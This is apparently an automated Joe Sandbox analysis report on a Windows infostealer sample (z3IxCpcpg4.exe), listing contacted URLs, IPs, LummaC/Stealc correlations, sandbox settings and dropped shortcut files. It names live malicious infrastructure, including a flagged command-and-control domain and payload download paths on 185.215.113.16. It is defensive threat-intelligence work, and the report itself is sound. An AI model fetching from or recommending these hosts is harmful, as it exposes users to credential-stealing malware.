https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_121.6.dr	false		high
https://community.fastly.steamstatic.co	z3IxCpcpg4.exe, 00000000.00000003.2293198896.0000000000931000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apim	z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2294277838.0000000005169000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2285779067.0000000005169000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://store.steampowered.com/subscriber_agreement/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.66.86	lev-tolstoi.com	United States	13335	CLOUDFLARENETUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580901
Start date and time:	2024-12-26 13:00:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	z3IxCpcpg4.exe renamed because original name is a hash value
Original Sample Name:	764b683cac60e423ff3659606d250cb4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/67@17/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 172.217.19.227, 23.218.210.69, 173.194.220.84, 172.217.19.238, 2.20.41.214, 172.217.17.46, 216.58.208.234, 172.217.19.234, 142.250.181.10, 142.250.181.74, 142.250.181.106, 142.250.181.138, 172.217.17.74, 172.217.19.170, 172.217.17.42, 172.217.19.202, 2.16.168.100, 2.16.168.102, 172.217.17.35, 13.107.246.63, 4.175.87.197, 23.218.208.109
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, www.bing.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:01:24	API Interceptor	100x Sleep call for process: z3IxCpcpg4.exe modified

LLM Input / Output

Input	Output
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "Yes", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.66.86	MV ROCKET_PDA.exe	Get hash	malicious	FormBook	Browse	www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
185.215.113.16	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	C8QT9HkXEb.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	0hRSICdcGg.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	6GNqkkKY0j.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
s-part-0035.t-0009.t-msedge.net	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	k6olCJyvIj.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	BeoHXxE7q3.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	9InQHaM8hT.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
steamcommunity.com	AiaStwRBdI.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HJVzgKyC0y.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	rUfr2hQGOb.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YhF4vhbnMW.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	B8NcU4mckY.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	k6olCJyvIj.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	BeoHXxE7q3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Zun6NRK3q3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	AiaStwRBdI.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HJVzgKyC0y.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	rUfr2hQGOb.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YhF4vhbnMW.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	B8NcU4mckY.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	k6olCJyvIj.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	BeoHXxE7q3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Zun6NRK3q3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
CLOUDFLARENETUS	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	P0SJULJxI0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse	104.21.66.113
	C8QT9HkXEb.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	r06aMlvVyM.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse	172.67.150.49
	XM6cn2uNux.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	0hRSICdcGg.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
WHOLESALECONNECTIONSNL	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	9InQHaM8hT.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse	185.215.113.206
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	185.215.113.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	23.1.237.91
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.1.237.91
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.1.237.91
	https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9	Get hash	malicious	Unknown	Browse	23.1.237.91
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse	23.1.237.91
	gVMKOpATpQ.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	23.1.237.91
	2AIgdyA1Cl.exe	Get hash	malicious	Stealc, Vidar	Browse	23.1.237.91
	q79Pocl81P.exe	Get hash	malicious	Cryptbot	Browse	23.1.237.91
a0e9f5d64349fb13191bc781f81f42e1	AiaStwRBdI.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	HJVzgKyC0y.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	rUfr2hQGOb.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	YhF4vhbnMW.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	B8NcU4mckY.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	k6olCJyvIj.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	BeoHXxE7q3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.66.86 23.55.153.106
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 11:02:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9721767910385775
Encrypted:	false
SSDEEP:	48:8gdBTpldHOidAKZdA19ehwiZUklqehSy+3:8aPiFy
MD5:	7729E5E4F84ED02C8A796843F8094D7F
SHA1:	9F5EDBFDA4CD23F7A7658729992AC73D30072EEB
SHA-256:	986379D5AB77C2120BA31DC887BC94005A6FAE22E355DC7590CC6C4828B1C6F9
SHA-512:	4674C9B6DC0E7B63C5CB191AF7E557F18A13CEB8E675A3B2C85D16865DD2C86AC71FE9F8381E9A51401F0E7A1A639A6445CD0CF82D624C3D5ECF200F734A17FC
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YC`....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YC`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YC`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YC`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YE`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........E..;.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 11:02:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.990743141850473
Encrypted:	false
SSDEEP:	48:87dBTpldHOidAKZdA1weh/iZUkAQkqeh1y+2:8vP49QQy
MD5:	A319E81A0925210B34DB194F4C0756CC
SHA1:	7DE8837C8E72FE1C80A6CEA21E928EDFD466046E
SHA-256:	D4296F4C6E5B6D6BAE8CB97908673034A46BD8C0EDF29ACDFC36E589634E9A19
SHA-512:	CA241924056305354E41389A45CAF4514D9764A71377B91F62464D2CD373BCF93E66EF9526CE3957650C610BF12E71DD4853EDFD3247BB29CAA5699BC9FBEC09
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....[....W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YC`....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YC`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YC`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YC`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YE`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........E..;.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.001753315064346
Encrypted:	false
SSDEEP:	48:8xedBTplsHOidAKZdA14tseh7sFiZUkmgqeh7sry+BX:8xQPjnxy
MD5:	8CDC5DE9F2299724C1E78791E1BB7376
SHA1:	B8E51523BFB7B1F95D2F26A2499E9D458665E96B
SHA-256:	E2C0370CCD44BC1910FFBF6EF8CB6CE078985861F7BA52821FDB1AB019E7AF91
SHA-512:	3399D83AE49864583F4C59E745FF84D52BC2736F13BB4652616B064E6929AF8C05A25237590392DF26C40837525A86105E3F1B8E5123C4D4A5C375CFB3E837DF
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YC`....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YC`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YC`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YC`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........E..;.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 11:02:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9885114594699065
Encrypted:	false
SSDEEP:	48:8j7edBTpldHOidAKZdA1vehDiZUkwqehJy+R:8j7QPjjy
MD5:	5EB60DBDE72DBE7DDE0BF2820B09F6A3
SHA1:	91B3185DB4BDC64512BC0F26F2618722D9182654
SHA-256:	D6C32AFBCE8EFD5D0D11821D54E5840B118A17FBF5DE7DC111DD22A5095B5279
SHA-512:	BA97F399BDCC6E2C45C5B49C8060C68A0F5368191D1EC01B232FAD708347F46D5150B3D6CC10E95EAAC19F468CDBA56897475F2516E240FB75DD4DA32FF87573
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........W..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YC`....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YC`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YC`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YC`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YE`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........E..;.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
